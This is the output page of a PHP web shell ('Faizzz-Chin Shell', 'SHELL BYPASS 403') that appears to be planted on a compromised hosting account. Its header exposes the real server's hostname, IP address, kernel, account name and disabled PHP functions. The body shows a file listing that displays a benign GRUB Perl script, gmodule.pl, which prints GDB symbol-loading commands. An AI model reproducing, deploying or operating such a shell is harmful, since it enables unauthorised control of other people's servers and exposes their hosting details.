SHELL BYPASS 403 |
Modern UI. Responsive. Powerful.

Faizzz-Chin Shell

: /lib/grub/i386-pc/ [ drwxr-xr-x ]
Uname\Kernel: Linux server.kxo.bgz.mybluehostin.me 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Server: Apache
PHP Version: 8.2.28 [ PHP INFO ]
Operating System: Linux
Server Ip: 162.240.163.222
Your Ip: 216.73.216.114
Date Time: 2025-07-11 02:34:58
User: dilseshaadi (1027) | Group: dilseshaadi (1027)
Safe Mode: OFF
Disable Function: exec,passthru,shell_exec,system

name : gmodule.pl
###
### Generate GDB commands, that load symbols for specified module,
### with proper section relocations. See .gdbinit
###
### $Id: gmodule.pl,v 1.2 2006/05/14 11:38:42 lkundrak Exp lkundrak $
### Lubomir Kundrak <lkudrak@skosi.org>
###

use strict;

while (<>) {
	my ($name, %sections) = split;

	print "add-symbol-file $name.module";

	open (READELF, "readelf -S $name.mod |") or die;
	while (<READELF>) {
		/\[\s*(\d+)\]\s+(\.\S+)/ or next;

		if ($2 eq '.text') {
			print " $sections{$1}";
			next;
		}

		print " -s $2 $sections{$1}"
			if ($sections{$1} ne '0x0');
	};
	close (READELF);
	print "\n";
}
© 2025 Faizzz-Chin